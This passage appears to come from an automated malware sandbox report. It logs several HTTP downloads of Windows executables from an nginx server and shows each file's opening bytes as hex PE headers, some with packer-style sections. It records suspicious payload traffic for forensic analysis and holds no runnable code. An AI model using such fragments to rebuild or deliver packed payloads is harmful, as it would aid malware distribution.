00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:45:34 GMTContent-Type: application/octet-streamContent-Length: 1886208Last-Modified: Wed, 30 Oct 2024 10:22:42 GMTConnection: keep-aliveETag: "672208f2-1cc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4b 00 00 04 00 00 e8 3c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 3c 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 3b 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 69 63 79 6e 77 70 67 00 b0 19 00 00 90 31 00 00 ae 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 68 76 6a 6f 79 6a 64 00 10 00 00 00 40 4b 00 00 04 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4b 00 00 22 00 00 00 a6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:46:36 GMTContent-Type: application/octet-streamContent-Length: 2985472Last-Modified: Wed, 30 Oct 2024 10:22:21 GMTConnection: keep-aliveETag: "672208dd-2d8e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 30 00 00 04 00 00 14 af 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 7a 63 73 78 6c 72 78 00 e0 2a 00 00 b0 05 00 00 d4 2a 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 68 69 63 6f 64 71 00 10 00 00 00 90 30 00 00 04 00 00 00 68 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 30 00 00 22 00 00 00 6c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:46:46 GMTContent-Type: application/octet-streamContent-Length: 2125824Last-Modified: Wed, 30 Oct 2024 10:22:36 GMTConnection: keep-aliveETag: "672208ec-207000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 70 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 72 00 00 04 00 00 bc d6 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 73 71 71 68 6b 77 6e 00 c0 19 00 00 a0 58 00 00 c0 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 64 67 67 74 66 68 6f 00 10 00 00 00 60 72 00 00 04 00 00 00 4a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 72 00 00 22 00 00 00 4e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:46:56 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 30 Oct 2024 10:42:19 GMTConnection: keep-aliveETag: "67220d8b-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 0d 22 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 e7 ec 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:47:01 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Wed, 30 Oct 2024 10:42:46 GMTConnection: keep-aliveETag: "67220da6-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 fa d5 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 62 6e 66 78 72 73 75 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6a 63 65 74 79 69 6d 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:47:02 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 10:47:07 GMTContent-Type: application/octet-streamContent-Length: 334848Last-Modified: Wed, 30 Oct 2024 07:33:14 GMTConnection: keep-aliveETag: "6721e13a-51c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 a7 cd 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 44 04 00 00 d4 00 00 00 00 00 00 b0 d0 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 52 80 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 80 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 81 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 42 04 00 00 10 00 00 00 44 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 27 25 00 00 00 60 04 00 00 26 00 00 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 f5 00 00 00 90 04 00 00 62 00 00 00 6e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 4b 00 00 00 90 05 00 00 4c 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 